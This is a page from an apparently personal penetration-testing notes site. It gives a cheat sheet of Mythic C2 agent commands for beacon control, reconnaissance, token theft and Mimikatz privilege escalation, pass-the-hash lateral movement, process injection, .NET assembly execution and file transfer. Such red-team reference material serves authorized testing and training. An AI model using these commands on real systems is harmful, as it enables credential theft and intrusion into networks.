Intrusionz3r0
HacktheboxTwitter
  • Welcome
  • Windows Penetration Testing
    • Enumeration
    • Credentials Attacks On Windows
    • Kerberos
    • Abuse ACLS
    • Common Attacks
    • Abuse Tokens
    • Kerberos “Double Hop”
    • Privileged Groups
    • Defense Evasion
      • Bypass AV/EDR via DInvoke + Sliver
      • AV Bypass using DSViper
      • Sliver + ScareCrow (Does not Work)
      • Evasion techniques
    • Active Directory Certificate Services
    • Windows Persistence
    • Privilege Escalation
    • Trust Enumeration and Attacks
    • Windows Lateral Movement
    • Powershell Cheetsheet
    • Microsoft Exchange and Office
  • Linux Penetration Testing
    • Linux Active directory
    • Tools
    • Privilege Groups
    • Post Exploitation
    • Privilege Escalation
      • Sudo Privilege escalation
      • Writable .service files
      • Wildcard on compression binaries
      • Path Abuse
      • Capabilities
      • Exploit Logrotate
      • Weak NFS Privileges
      • Hijacking Tmux Sessions
      • Shared Libraries
      • Shared Object Hijacking
      • Python Library Hijacking
      • Linux Enumeration
    • Stealing Linux Credentials
    • Critical Vulnerabilities
    • Upgrading TTY
    • Process monitoring
    • Miscellaneous
    • Escape Restricted Shell
  • Malware Development
    • Malware Development Essentials
    • Code Snippets
  • Social Engineering
  • Portforwarding and tunneling
  • File Transfer Techniques
  • Password Attacks
  • Enumeration
    • Network Enumeration
    • (OSINT) Active Enumeration
    • (OSINT) Passive Enumeration
    • [22] SSH
    • [21] FTP
    • [25,465,587] SMTP
    • [53] DNS Enumeration
    • [80 443] HTTP HTTPS
    • [110,143,993,995] IMAP/POP3 Enumeration
    • [111,2049] Network File System
    • [139,445] SMB Enumeration
    • [161] SNMP
    • [512,513,514] R-Services
    • [623] IPMI
    • [873] Rsync
    • [1433] MSSQL
    • [1521] Oracle TNS
    • [3389] Remote Desktop Protocol (RDP)
    • [5985/5986] WinRM
    • [3306] Mysql
    • [513] Rlogin
  • Hacking Web
    • Methodology
    • Vulnerabilities
      • SQL Injection
      • Cross Site Scripting (XSS)
      • File path traversal/Local File Inclusion
      • File Upload Attacks
      • Denial of Service
      • Command Injection
      • Insecure Direct Object Reference (IDOR)
      • XML External Entity (XXE) Injection
      • Web Mass Assignment Vulnerabilities
      • Log4Shell Exploitation Guide
      • Authentication
      • Business Vulnerabilities
      • Access control vulnerabilities
      • Server-Side Request Forgery (SSRF)
      • Cross-site request forgery (CSRF)
      • Cross-origin resource sharing (CORS)
      • Clickjacking
      • DOM-based vulnerabilities
      • JWT vulnerabilities
      • Password reset poisoning
    • Web Tech Detection viaa Tokens, Headers & Cookies
    • Burpsuite through SOCKS5
    • Bypass 403 - Forbidden
  • OSINT
  • Common Applications
    • Gitlab
    • Splunk
    • Tomcat
    • Joomla
    • Microsoft Internet Information Services (IIS)
    • Nagios XI
    • Wordpress
    • Drupal
    • Tomcat CGI
    • osTicket
    • Attacking Thick Client Applications
    • PRTG Network Monitor
    • Jenkins
    • ColdFusion
    • WebLogic
    • Grafana
    • Umbraco
  • Containers Pentesting
  • C2 Command and Control
    • Sliver
    • Cobalt Strike
    • Mythic
  • Report Templates
  • Anonymity Guide
  • Labs
    • Vulnlabs
      • Baby
      • Trusted (Chain)
      • Retro
      • Retro2
      • Hybrid (Chain)
      • Baby2
      • Breach
      • Sendai
      • Sweep
      • Delegate
      • Redelegate
      • Media
      • Bruno
      • Cicada
      • Lustrous2
      • Tengu (Chain)
      • Reflection (Chain)
      • Tea (Chain)
      • Heron (Chain)
      • Lustrous (Chain)
      • Kaiju (Chain)
      • Intercept (Chain)
      • Sidecar (Chain)
      • Vigilant (Chain)
      • Job
      • Job2
      • Puppet (Chain)
      • Mythical (Chain)
      • Push (Chain)
Powered by GitBook
On this page
  • Beacon Management (Real-Time C2 Control)
  • Information Gathering / Recon
  • Privilege Escalation
  • Lateral Movement
  • Post-Exploitation / Execution
  • File Transfer
  1. C2 Command and Control

Mythic

Beacon Management (Real-Time C2 Control)

# Set agent to real-time communication (no sleep)
Mythic > sleep 0 0

# Instruct agent to exit
Mythic > exit

# List all running jobs
Mythic > jobs

# Kill a specific job
Mythic > jobkill [jid]

# Load additional commands into agent
Mythic > load command1 command2 ...

# Link to a peer-to-peer (SMB/TCP) agent
Mythic > link

# Unlink a linked agent
Mythic > unlink

Information Gathering / Recon

# List network interfaces and IP addresses
Mythic > ifconfig

# List running processes
Mythic > ps

# List directory contents
Mythic > ls -Path [path]

# Print current working directory
Mythic > pwd

# Display domain controllers
Mythic > net_dclist [domain.local]

# List shares on a remote machine
Mythic > net_shares -Computer [hostname]

# Show local groups on a machine
Mythic > net_localgroup [hostname]

# Show members of a local group
Mythic > net_localgroup_member -Group [groupname] -Computer [hostname]

# View network connections
Mythic > netstat -Tcp -Udp

# Take a screenshot
Mythic > screenshot

Privilege Escalation

# Attempt to enable all possible privileges
Mythic > getprivs

# Use Mimikatz directly
Mythic > mimikatz -Command "privilege::debug"

# Steal token from a PID
Mythic > steal_token [pid]

# Impersonate a user with credentials
Mythic > make_token -username [user] -password [pass]

# PrintSpoofer to escalate to SYSTEM
Mythic > printspoofer -Command "cmd.exe"

# Revert to original token
Mythic > rev2self

Lateral Movement

# Use Pass-the-Hash to run commands
Mythic > pth -Domain [domain] -User [user] -NTLM [hash] -Run [cmd.exe]

# Copy file to remote system
Mythic > cp -Path [source] -Destination [dest]

# List services or manipulate them
Mythic > sc -Query -Computer [host]

# Use PowerShell remoting (if applicable)
Mythic > powershell -Command "Invoke-Command ..."

Post-Exploitation / Execution

# Run shell command
Mythic > shell whoami

# Run PowerShell in current process
Mythic > powershell -Command "Get-Process"

# Import PowerShell script
Mythic > powershell_import

# Inject PowerShell into a specific process
Mythic > psinject -PID [pid] -Command "..."

# Execute .NET assembly
Mythic > execute_assembly -Assembly SharpHound.exe -Arguments "-c all --zipfilename mythical"

# Register .NET assembly
Mythic > register_assembly

# Execute inline .NET assembly
Mythic > inline_assembly -Assembly [Assembly.exe] -Arguments "..."

# Execute unmanaged PE
Mythic > execute_pe -PE [binary.exe] -Arguments "..."

# Execute Beacon Object File (BOF)
Mythic > execute_coff -Coff [file.o] -Function [go]

File Transfer

# Upload a file
Mythic > upload

# Download a file
Mythic > download -Path [path]

# Remove a file
Mythic > rm -Path [path]
PreviousCobalt StrikeNextReport Templates

Last updated 5 days ago

Page cover image